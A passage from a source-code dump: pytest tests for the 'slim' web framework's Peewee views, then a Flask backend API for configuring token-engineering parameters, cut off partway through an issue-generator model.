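# foreign keys with the catalog queries defined above
pg_conn = asyncio.get_event_loop().run_until_complete(
    asyncpg.connect('postgresql://user:password@localhost/example'))


@app.route('topic')
class TopicView(AsyncpgView):
    conn = pg_conn
    table_name = 'topic'
```
The exact ordering between connecting and registering routes depends on how the application prepares its views, so treat this only as an illustration of which attributes have to be filled in.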
#### File: slim/tests/test_peewee.py
```python
import json
import pytest
from unittest import mock
from aiohttp.test_utils import make_mocked_request
from multidict import MultiDict
from slim.base.user import BaseUserViewMixin
from slim.retcode import RETCODE
from slim.support.peewee import PeeweeView
from peewee import *
from slim import Application, ALL_PERMISSION
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=ALL_PERMISSION)
db = SqliteDatabase(":memory:")
class ATestModel(Model):
info = BlobField()
class Meta:
table_name = 'test'
database = db
@app.route('test')
class ATestView(PeeweeView):
model = ATestModel
db.create_tables([ATestModel])
async def test_post_blob():
request = make_mocked_request('POST', '/api/test', headers={},
protocol=mock.Mock(), app=app)
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
request._post = dict(info='aabbcc')
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
request._post = dict(info='a') # 0x0A
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['info'] == b'\xaa\xbb\xcc'
request = make_mocked_request('POST', '/api/test',
headers={'content-type': 'application/json'},
protocol=mock.Mock(), app=app)
raw_json = json.dumps({'info': 'aabbcc'})
request._post = raw_json
request._read_bytes = bytes(raw_json, encoding='utf-8')
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
```
#### File: slim/tests/test_slim_permissions.py
```python
from slim.base.app import SlimPermissions
flag = 'TeSt.'
def test_slim_permissions():
o = SlimPermissions(flag)
assert o.aaa == flag
assert o['aaa'] == flag
o.aaa = '123'
assert o.aaa == '123'
assert o['aaa'] == '123'
```
#### File: slim/tests/test_sqlview.py
```python
import json
import pytest
from unittest import mock
from aiohttp.test_utils import make_mocked_request
from slim.retcode import RETCODE
from slim.support.peewee import PeeweeView
from peewee import *
from slim import Application, ALL_PERMISSION
from playhouse.sqlite_ext import JSONField as SQLITE_JSONField
from tests.tools import make_mocked_view_instance
pytestmark = [pytest.mark.asyncio]
app = Application(cookies_secret=b'123456', permission=ALL_PERMISSION)
db = SqliteDatabase(":memory:")
class ATestModel(Model):
name = TextField()
binary = BlobField()
count = IntegerField()
active = BooleanField(default=False)
flt = FloatField(default=0)
json = SQLITE_JSONField()
value = IntegerField(null=True)
class Meta:
table_name = 'test'
database = db
class ATestBModel(Model):
name = TextField()
link = ForeignKeyField(ATestModel)
class Meta:
table_name = 'test2'
database = db
class ATestCModel(Model):
name = TextField()
link = ForeignKeyField(ATestBModel)
class Meta:
table_name = 'test3'
database = db
class ATestDModel(Model):
name = TextField()
link = ForeignKeyField(ATestBModel, null=True)
class Meta:
table_name = 'test4'
database = db
db.create_tables([ATestModel, ATestBModel, ATestCModel, ATestDModel])
a1 = ATestModel.create(name='Name1', binary=b'test1', count=1, json={'q': 1, 'w1': 2})
a2 = ATestModel.create(name='Name2', binary=b'test2', count=2, json={'q': 1, 'w2': 2})
a3 = ATestModel.create(name='Name3', binary=b'test3', count=3, json={'q': 1, 'w3': 2})
a4 = ATestModel.create(name='Name4', binary=b'test4', count=4, json={'q': 1, 'w4': 2})
a5 = ATestModel.create(name='Name5', binary=b'test5', count=5, json={'q': 1, 'w5': 2})
b1 = ATestBModel.create(name='NameB1', link=a1)
b2 = ATestBModel.create(name='NameB2', link=a2)
b3 = ATestBModel.create(name='NameB3', link=a3)
b4 = ATestBModel.create(name='NameB4', link=a4)
b5 = ATestBModel.create(name='NameB5', link=a5)
c1 = ATestCModel.create(name='NameC1', link=b1)
c2 = ATestCModel.create(name='NameC2', link=b2)
c3 = ATestCModel.create(name='NameC3', link=b3)
c4 = ATestCModel.create(name='NameC4', link=b4)
c5 = ATestCModel.create(name='NameC5', link=b5)
ATestDModel.insert_many([
{'name': 'NameD1', 'link': None},
{'name': 'NameD2', 'link': None},
{'name': 'NameD3', 'link': None},
])
@app.route('test1')
class ATestView(PeeweeView):
model = ATestModel
@app.route('test2')
class ATestView2(PeeweeView):
model = ATestBModel
@app.route('test3')
class ATestView3(PeeweeView):
model = ATestCModel
@classmethod
def ready(cls):
cls.add_soft_foreign_key('id', 'wrong table name')
cls.add_soft_foreign_key('id', 'test2', 't2')
cls.add_soft_foreign_key('id', 'test', 't1')
@app.route('test4')
class ATestView4(PeeweeView):
model = ATestDModel
@classmethod
def ready(cls):
cls.add_soft_foreign_key('id', 'test')
async def test_bind():
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
assert len(view.model._meta.fields) == len(view.fields)
assert set(view.model._meta.fields.values()) == set(view.fields.values())
async def test_get():
# 1. success: no statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. failed: simple statement and not found
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'name': '1'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 3. failed: column not found
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'qqq': 1}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 4. failed: invalid parameter (Invalid operator)
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'qqq.a.b': 1}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 5. failed: invalid parameter (bad value)
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt': 'qq'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 6. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 7. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.eq': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 8. not found: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.lt': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 9. success: simple statement
request = make_mocked_request('GET', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView(app, request)
view._params_cache = {'flt.le': '0'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
async def test_get_loadfk():
# 1. success: simple statement
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1'}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. invalid params: loadfk must be json string
view = await make_mocked_view_instance(app, ATestView2, 'GET', '/api/test2', {'name': 'NameB1', 'loadfk': {'aaa': None}})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 3. failed: column not found
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'aaa': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 4. success: simple load
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'link_id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link_id']['id'] == 1
assert view.ret_val['data']['link_id']['name'] == 'Name1'
# 5. success: load as
request = make_mocked_request('GET', '/api/test2', headers={}, protocol=mock.Mock(), app=app)
view = ATestView2(app, request)
view._params_cache = {'name': 'NameB1', 'loadfk': json.dumps({'link_id': {'as': 'link'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link']['id'] == 1
assert view.ret_val['data']['link']['name'] == 'Name1'
# 7. success: recursion load
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'link_id': {'loadfk': {'link_id': None}}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['link_id']['id'] == 2
assert view.ret_val['data']['link_id']['name'] == 'NameB2'
assert view.ret_val['data']['link_id']['link_id']['id'] == 2
assert view.ret_val['data']['link_id']['link_id']['name'] == 'Name2'
assert view.ret_val['data']['link_id']['link_id']['count'] == 2
# 8. failed: load soft link, wrong table name
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC1', 'loadfk': json.dumps({'id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 9. failed: load soft link, wrong table name and wrong condition
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'not found', 'loadfk': json.dumps({'id': None})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 10. failed: foreign key not match table
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 'test1'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
# 11. success: soft foreign key
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 't2'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id']['id'] == 2
assert view.ret_val['data']['id']['name'] == 'NameB2'
# 12. success: soft foreign key as
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': {'table': 't2', 'as': 't2'}})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
# 13. success: list values
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': [{'table': 't2', 'as': 't2'}]})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
# 13. success: read multi tables with one key
request = make_mocked_request('GET', '/api/test3', headers={}, protocol=mock.Mock(), app=app)
view = ATestView3(app, request)
view._params_cache = {'name': 'NameC2', 'loadfk': json.dumps({'id': [{'table': 't2', 'as': 't2'}, {'table': 't1', 'as': 't1'}]})}
await view._prepare()
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['id'] == 2
assert view.ret_val['data']['t2']['id'] == 2
assert view.ret_val['data']['t2']['name'] == 'NameB2'
assert view.ret_val['data']['t1']['name'] == 'Name2'
# 14. loadfk and all foreign keys are null
request = make_mocked_request('GET', '/api/test4/list/1', headers={}, protocol=mock.Mock(), app=app)
view = ATestView4(app, request)
view._params_cache = {'loadfk': json.dumps({'link_id': None})}
await view._prepare()
await view.list()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 15. loadfk and all foreign keys are null
view = await make_mocked_view_instance(app, ATestView4, 'GET', '/api/test4/list/1',
{'loadfk': json.dumps({'link_id': None})})
await view.list()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
async def test_new():
# 1. simple insert
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6', binary=b'test6', count=1, json={'q': 1, 'w6': 2})
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
# 2. insert and return records
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6', binary=b'test6', count=1, json=json.dumps({'q': 1, 'w6': 2}))
request._post['returning'] = True
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name6'
# 3. insert without necessary parameter
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name6',count=1)
view = ATestView(app, request)
await view._prepare()
await view.new()
assert view.ret_val['code'] == RETCODE.INVALID_POSTDATA
async def test_update():
a1 = ATestModel.create(name='Name1A', binary=b'test1A', count=1, json={'q': 1, 'w1a': 2})
a2 = ATestModel.create(name='Name2A', binary=b'test2A', count=2, json={'q': 1, 'w2a': 2})
a3 = ATestModel.create(name='Name3A', binary=b'test3A', count=3, json={'q': 1, 'w3a': 2})
# 1. simple update
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name1AA', count='4')
view = ATestView(app, request)
view._params_cache = {'name': 'Name1A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
val = ATestModel.get(ATestModel.binary==b'test1A')
assert val.name == 'Name1AA'
# 2. simple update with returning
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = dict(name='Name2AA', count='5')
request._post['returning'] = True
view = ATestView(app, request)
view._params_cache = {'name': 'Name2A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name2AA'
# 3. incr
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = {'count.incr': 1, 'returning': True}
view = ATestView(app, request)
view._params_cache = {'name': 'Name3A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name3A'
assert view.ret_val['data']['count'] == 4
# 3. incr -1
request = make_mocked_request('POST', '/api/test1', headers={}, protocol=mock.Mock(), app=app)
request._post = {'count.incr': -2, 'returning': True}
view = ATestView(app, request)
view._params_cache = {'name': 'Name3A'}
await view._prepare()
await view.update()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['name'] == 'Name3A'
assert view.ret_val['data']['count'] == 2
async def test_is():
# 1. success: .eq null (sqlite)
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 2. success: .ne null
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.ne': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 3. success: .is null
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.is': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 4. success: .isnot null
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.isnot': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 5. success: .is value
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'name.is': 'Name1'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['binary'] == b'test1'
# 6. success: .isnot value
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'name.isnot': 'Name1'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['binary'] == b'test2'
async def test_delete():
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 0
b1 = ATestModel.create(name='Name1B', binary=b'test1B', count=1, json={'q': 1, 'w1b': 2})
# b2 = ATestModel.create(name='Name2B', binary=b'test2B', count=2, json={'q': 1, 'w2b': 2})
# b3 = ATestModel.create(name='Name3B', binary=b'test3B', count=3, json={'q': 1, 'w3b': 2})
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 1
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test4', {'name': 'Name1B'})
await view.delete()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 0
async def test_select():
# 1. success
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name,binary,count,active,flt,json,value'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'].keys() == {'name', 'binary', 'count', 'active', 'flt', 'json', 'value'}
# 2. success: list
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name,binary,count,active,flt,json,value'})
await view.list()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 3. success: random spaces
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name, binary,count,\n active,flt,\rjson,\t value'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 4. success: random spaces
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'].keys() == {'name'}
# 5. failed: Column not found
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'select': 'name1,binary'})
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
async def test_value_type():
# 1. success
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test1',
post={'name': 'Name1BB', 'binary': b'test1bb',
'json': {'q': 1, 'w6': 2}, 'count': 4})
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
val = ATestModel.get(ATestModel.binary == b'test1bb')
assert val.name == 'Name1BB'
# 2. failed: post, bad json
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test1',
post={'name': 'Name2BB', 'binary': b'test2bb',
'json': '{', 'count': 5})
await view.new()
assert view.ret_val['code'] == RETCODE.INVALID_POSTDATA
# 2. failed: params, bad json
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'json': '{', 'count': 5})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
async def test_in():
# 1. invalid params: not a json string
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'name.in': ['Name1', 'Name2', 'Name3']})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 2. success
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'name.in': json.dumps(['Name1', 'Name2', 'Name3'])})
await view.list()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['info']['items_count'] == 3
class ATestReadyModel(ATestModel):
class Meta:
table_name = 'ready_test'
class ATestReadyModel2(ATestModel):
class Meta:
table_name = 'ready_test2'
@app.route('test1')
class ATestReadyView(PeeweeView):
model = ATestReadyModel
a = 1
@classmethod
def ready(cls):
cls.a = 2
@app.route('test1')
class ATestReadyView2(PeeweeView):
model = ATestReadyModel2
a = 1
@classmethod
async def ready(cls):
cls.a = 2
async def test_ready():
assert ATestReadyView.a == 2
assert ATestReadyView2.a == 2
app._prepare()
if __name__ == '__main__':
from slim.utils.async_run import sync_call
sync_call(test_bind)
sync_call(test_get)
sync_call(test_get_loadfk)
sync_call(test_new)
sync_call(test_update)
sync_call(test_is)
sync_call(test_delete)
sync_call(test_select)
sync_call(test_value_type)
sync_call(test_in)
sync_call(test_ready)
``` |
{
"source": "0xNuggan/commons-config-backend",
"score": 2
} |
#### File: 0xNuggan/commons-config-backend/main.py
```python
from flask import Flask, jsonify, request
from flask_restful import Resource, Api, reqparse
from flask_cors import CORS
import json
from dotenv import load_dotenv
from models.disputable_voting import DisputableVotingModel
from models.token_lockup import TokenLockupModel
from models.augmented_bonding_curve import BondingCurveHandler
from models.issue_generator import IssueGeneratorModel
from models.conviction_voting import ConvictionVotingModel
import models.import_params as import_params
app = Flask(__name__)
api = Api(app)
CORS(app)
load_dotenv()
class status(Resource):
def get(self):
try:
return {'data': 'Api running'}
except Exception as error:
return {'data': str(error)}
class TokenLockup(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('openingPrice', type=float)
parser.add_argument('tokenFreeze', type=float)
parser.add_argument('tokenThaw', type=float)
parameters = parser.parse_args()
opening_price = parameters['openingPrice']
token_freeze_period = parameters['tokenFreeze']
token_thaw_period = parameters['tokenThaw']
token_lockup_model = TokenLockupModel(opening_price=opening_price,
token_freeze_period=token_freeze_period,
token_thaw_period=token_thaw_period)
return jsonify(token_lockup_model.get_data())
class DisputableVoting(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('supportRequired', type=float)
parser.add_argument('minimumQuorum', type=float)
parser.add_argument('voteDuration', type=float)
parser.add_argument('delegatedVotingPeriod', type=float)
parser.add_argument('quietEndingPeriod', type=float)
parser.add_argument('quietEndingExtension', type=float)
parser.add_argument('executionDelay', type=float)
parameters = parser.parse_args()
support_required = parameters['supportRequired']
minimum_quorum = parameters['minimumQuorum']
vote_duration = parameters['voteDuration']
delegated_voting_period = parameters['delegatedVotingPeriod']
quiet_ending_period = parameters['quietEndingPeriod']
quiet_ending_extension = parameters['quietEndingExtension']
execution_delay = parameters['executionDelay']
disputable_voting_model = DisputableVotingModel(support_required=support_required,
minimum_quorum=minimum_quorum,
vote_duration=vote_duration,
delegated_voting_period=delegated_voting_period,
quiet_ending_period=quiet_ending_period,
quiet_ending_extension=quiet_ending_extension,
execution_delay=execution_delay)
return jsonify(disputable_voting_model.get_data())
class AugmentedBondingCurve(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('commonsTribute', type=str)
parser.add_argument('openingPrice', type=str)
parser.add_argument('entryTribute', type=str)
parser.add_argument('exitTribute', type=str)
parser.add_argument('ragequitAmount', type=str)
parser.add_argument('initialBuy', type=str)
parser.add_argument('reserveBalance', type=str)
parser.add_argument('stepList', action='append')
parser.add_argument('virtualSupply', type=str)
parser.add_argument('virtualBalance', type=str)
parser.add_argument('zoomGraph', type=str)
parameters = parser.parse_args()
commons_percentage = float(parameters['commonsTribute']) if parameters['commonsTribute'] is not None else 0.05
opening_price = float(parameters['openingPrice']) if parameters['openingPrice'] is not None else 1.50
entry_tribute = float(parameters['entryTribute']) if parameters['entryTribute'] is not None else 0.05
exit_tribute = float(parameters['exitTribute']) if parameters['exitTribute'] is not None else 0.05
ragequit_amount = float(parameters['ragequitAmount']) if parameters['ragequitAmount'] is not None else 0
initial_buy = float(parameters['initialBuy']) if parameters['initialBuy'] is not None else 0
scenario_reserve_balance = float(parameters['reserveBalance']) if parameters['reserveBalance'] is not None else (1571223.57 - initial_buy - ragequit_amount)*(1-commons_percentage)
steplist = parameters['stepList'] if parameters['stepList'] is not None else ""
virtual_supply = float(parameters['virtualSupply']) if parameters['virtualSupply'] is not None else -1
virtual_balance = float(parameters['virtualBalance']) if parameters['virtualBalance'] is not None else -1
zoom_graph = int(parameters['zoomGraph']) if parameters['zoomGraph'] is not None else 0
augmented_bonding_curve_model = BondingCurveHandler(
commons_percentage=commons_percentage,
ragequit_amount=ragequit_amount,
opening_price=opening_price,
entry_tribute=entry_tribute,
exit_tribute=exit_tribute,
initial_buy=initial_buy,
scenario_reserve_balance=scenario_reserve_balance,
virtual_supply= virtual_supply,
virtual_balance= virtual_balance,
steplist=steplist,
zoom_graph= zoom_graph )
return jsonify(augmented_bonding_curve_model.get_data())
class IssueGenerator(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('title', type=str)
parser.add_argument('overallStrategy', type=str)
parser.add_argument('tokenLockup', type=dict)
parser.add_argument('augmentedBondingCurve', type=dict)
parser.add_argument('taoVoting', type=dict)
parser.add_argument('convictionVoting', type=dict)
parser.add_argument('advancedSettings', type=dict)
parameters = json.loads(request.form.get('body'))
image_files = request.files
title = parameters['title']
overall_strategy = parameters['overallStrategy']
token_lockup = parameters['tokenLockup']
abc = parameters['augmentedBondingCurve']
tao_voting = parameters['taoVoting']
conviction_voting = parameters['convictionVoting']
advanced_settings = parameters['advancedSettings']
abc['commonsTribute'] = float(abc['commonsTribute']) if abc['commonsTribute'] is not None else 0.05
abc['openingPrice'] = float(abc['openingPrice']) if abc['openingPrice'] is not None else 1.50
abc['entryTribute'] = float(abc['entryTribute']) if abc['entryTribute'] is not None else 0.05
abc['exitTribute'] = float(abc['exitTribute']) if abc['exitTribute'] is not None else 0.05
abc['ragequitAmount'] = float(abc['ragequitAmount']) if abc['ragequitAmount'] is not None else 0
abc['initialBuy'] = float(abc['initialBuy']) if abc['initialBuy'] is not None else 0
abc['reserveBalance'] = float(abc['reserveBalance']) if abc['reserveBalance'] is not None else (1571223.57 - abc['initialBuy'] - abc['ragequitAmount'])*(1-abc['commonsTribute'])
abc['stepList'] = abc['stepList'] if abc['stepList'] is not None else ""
abc['virtualSupply'] = float(abc['virtualSupply']) if abc['virtualSupply'] is not None else -1
abc['virtualBalance'] = float(abc['virtualBalance']) if abc['virtualBalance'] is not None else -1
abc['zoomGraph'] = int(abc['zoomGraph']) if abc['zoomGraph'] is not None else 0
issue_generator = IssueGeneratorModel(
raw_body=parameters,
title=title,
token_lockup=token_lockup,
abc=abc,
tao_voting=tao_voting,
conviction_voting=conviction_voting,
advanced_settings=advanced_settings,
overall_strategy=overall_strategy,
image_files=image_files
)
return jsonify(issue_generator.generate_output())
class ConvictionVoting(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('spendingLimit', type=float)
parser.add_argument('minimumConviction', type=float)
parser.add_argument('convictionGrowth', type=int)
parser.add_argument('convictionVotingPeriodDays', type=int)
parameters = parser.parse_args()
spending_limit = parameters['spendingLimit']
minimum_conviction = parameters['minimumConviction']
conviction_growth = parameters['convictionGrowth']
voting_period_days = parameters['convictionVotingPeriodDays']
conviction_voting_model = ConvictionVotingModel(
spending_limit=spending_limit,
minimum_conviction=minimum_conviction,
conviction_growth=conviction_growth,
voting_period_days=voting_period_days
)
return jsonify(conviction_voting_model.get_data())
class ImportParams(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('issueNumber', type=int)
parameters = parser.parse_args()
issue_number = parameters.get('issueNumber', '')
return jsonify(import_params.get_data(issue_number))
api.add_resource(status, '/')
api.add_resource(ImportParams, '/import-parameters/')
api.add_resource(TokenLockup, '/token-lockup/')
api.add_resource(DisputableVoting, '/disputable-voting/')
api.add_resource(AugmentedBondingCurve, '/augmented-bonding-curve/')
api.add_resource(IssueGenerator, '/issue-generator/')
api.add_resource(ConvictionVoting, '/conviction-voting/')
if __name__ == '__main__':
app.run(debug=True)
```
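A quick client-side sanity check of the endpoints above; the host and port assume the default Flask dev server started by `app.run(debug=True)`, and the parameter values are arbitrary examples.
```python
import requests

BASE = 'http://127.0.0.1:5000'

# token lockup: all three parameters are parsed as floats by the resource above
r = requests.post(BASE + '/token-lockup/', data={
    'openingPrice': 1.5,
    'tokenFreeze': 20,
    'tokenThaw': 15,
})
print(r.json())

# conviction voting
r = requests.post(BASE + '/conviction-voting/', data={
    'spendingLimit': 0.2,
    'minimumConviction': 0.01,
    'convictionGrowth': 2,
    'convictionVotingPeriodDays': 7,
})
print(r.json())

# the /issue-generator/ endpoint differs: it reads a JSON string from the 'body'
# form field plus image files from request.files (see the resource above), so a
# call would look roughly like this (file names are made up):
# requests.post(BASE + '/issue-generator/',
#               data={'body': json.dumps(payload)},
#               files={'tokenLockup': open('token_lockup.png', 'rb')})
```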
#### File: commons-config-backend/models/issue_generator.py
```python
import pandas as pd
import requests
import json
import os
import base64
from base64 import b64encode
from dotenv import load_dotenv
from pymongo import MongoClient
from models.data.issue_submission_data import issue_data, advanced_settings_data
from models.token_lockup import TokenLockupModel
from models.conviction_voting import ConvictionVotingModel
from models.augmented_bonding_curve import BondingCurveHandler
load_dotenv()
class IssueGeneratorModel:
def __init__(self,
raw_body={},
title=None,
token_lockup=None,
abc=None,
tao_voting=None,
conviction_voting=None,
advanced_settings=None,
overall_strategy=None,
image_files=None):
self.raw_body = raw_body
self.issue_number = 0
self.title = title if title is not None else "TEC Config Dashboard Proposal test"
self.overall_strategy = overall_strategy if overall_strategy is not None else ""
self.token_lockup = token_lockup if token_lockup is not None else {
"openingPrice": 5,
"tokenFreeze": 20,
"tokenThaw": 15,
"strategy": ""
}
self.abc = abc if abc is not None else {
"commonsTribute": 0.25,
"ragequitAmount": 60,
"initialBuy": 200,
"openingPrice":1.65,
"reserveBalance": 1571.22357,
"entryTribute": 0.05,
"exitTribute": 0.15,
